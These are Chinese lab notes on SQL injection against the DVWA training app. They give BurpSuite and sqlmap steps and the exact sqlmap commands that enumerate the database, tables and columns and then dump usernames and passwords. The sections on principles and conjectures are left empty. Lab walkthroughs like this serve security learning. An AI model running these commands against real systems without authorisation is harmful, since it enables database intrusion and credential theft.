Sql注入爆破:
- 工具:Sqlmap、BurpSuit
- 方法:利用BurpSuit抓包获取登录cookie进行爆破(实质是利用root账户)
- DVWA级别:low
1)原理:
2)实战:
- BurpSuit抓包
在SQL Injection 输入栏输入:1
- 保存抓包数据
将抓包信息保存到本地文件test:
- Sqlmap暴力破解
开启Sqlmap,输入:sqlmap -r /root/Desktop/test --current-db
(根据当前请求信息猜解当前数据库;猜想:破解的原理是什么?)
猜解到数据库:‘dvwa’;进一步爆破该数据库表,输入:sqlmap -r /root/Desktop/test -D dvwa --tables
获取到两个表:guestbook、users,为了进一步破解密码,继续猜解users表
输入:sqlmap -r /root/Desktop/test -D dvwa -T users --columns
获取users表中字段,其中user和password字段内容是我们需要的,继续暴力破解
输入:sqlmap -r /root/Desktop/test -D dvwa -T users -C user,password --dump
暴力破解成功!获取账户和密码!
3)猜想: